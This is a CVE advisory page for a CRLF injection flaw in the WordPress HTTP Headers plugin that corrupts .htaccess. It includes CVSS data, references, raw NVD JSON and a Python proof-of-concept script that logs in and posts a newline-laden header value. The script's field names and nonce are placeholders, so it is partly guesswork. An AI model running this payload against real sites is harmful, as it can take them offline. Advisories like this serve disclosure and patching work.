Security Vulnerability Report
CVE-2026-2717 CVSS 5.5 MEDIUM

Published: 2026-04-22 09:16:21
Last Modified: 2026-04-22 20:22:51

Description

The HTTP Headers plugin for WordPress is vulnerable to CRLF Injection in all versions up to, and including, 1.19.2. This is due to insufficient sanitization of custom header name and value fields before writing them to the Apache .htaccess file via `insert_with_markers()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary newline characters and additional Apache directives into the .htaccess configuration file via the 'Custom Headers' settings, leading to Apache configuration parse errors and potential site-wide denial of service.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

WordPress HTTP Headers plugin <= 1.19.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL and login credentials (placeholder)
target_url = "http://example.com/wp-admin/admin.php?page=http-headers"
login_url = "http://example.com/wp-login.php"
username = "admin"
password = "password"

# Create a session to maintain cookies
session = requests.Session()

# 1. Login to WordPress
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": target_url,
}
session.post(login_url, data=login_data)

# 2. Prepare the malicious payload with CRLF injection
# Injecting a newline character to break Apache configuration
malicious_header_name = "X-Malicious-Header"
malicious_header_value = "Value\r\n\n# This line breaks the config"

# 3. Send the payload to the plugin settings
# Note: Field names (action, option_page, etc.) depend on the specific plugin implementation
payload_data = {
    "action": "update",
    "option_page": "http_headers_options",
    "_wpnonce": "<fetch_from_page>",  # Nonce required
    "custom_headers[]": {malicious_header_name: malicious_header_value},
}
response = session.post(target_url, data=payload_data)

if response.status_code == 200:
    print("[+] Payload sent successfully. Check .htaccess for configuration corruption.")
else:
    print("[-] Failed to send payload.")

References

- https://plugins.trac.wordpress.org/browser/http-headers/tags/1.19.2/http-headers.php#L1098
- https://plugins.trac.wordpress.org/browser/http-headers/tags/1.19.2/http-headers.php#L745
- https://plugins.trac.wordpress.org/browser/http-headers/trunk/http-headers.php#L1098
- https://plugins.trac.wordpress.org/browser/http-headers/trunk/http-headers.php#L745
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7716e77f-e899-4046-9421-86fc0c36c245?source=cve

Weakness: CWE-93 (Improper Neutralization of CRLF Sequences)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2717",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-22T09:16:20.987",
    "lastModified": "2026-04-22T20:22:50.570",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The HTTP Headers plugin for WordPress is vulnerable to CRLF Injection in all versions up to, and including, 1.19.2. This is due to insufficient sanitization of custom header name and value fields before writing them to the Apache .htaccess file via `insert_with_markers()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary newline characters and additional Apache directives into the .htaccess configuration file via the 'Custom Headers' settings, leading to Apache configuration parse errors and potential site-wide denial of service."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-93"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/http-headers/tags/1.19.2/http-headers.php#L1098", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/http-headers/tags/1.19.2/http-headers.php#L745", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/http-headers/trunk/http-headers.php#L1098", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/http-headers/trunk/http-headers.php#L745", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7716e77f-e899-4046-9421-86fc0c36c245?source=cve", "source": "[email protected]"}
    ]
  }
}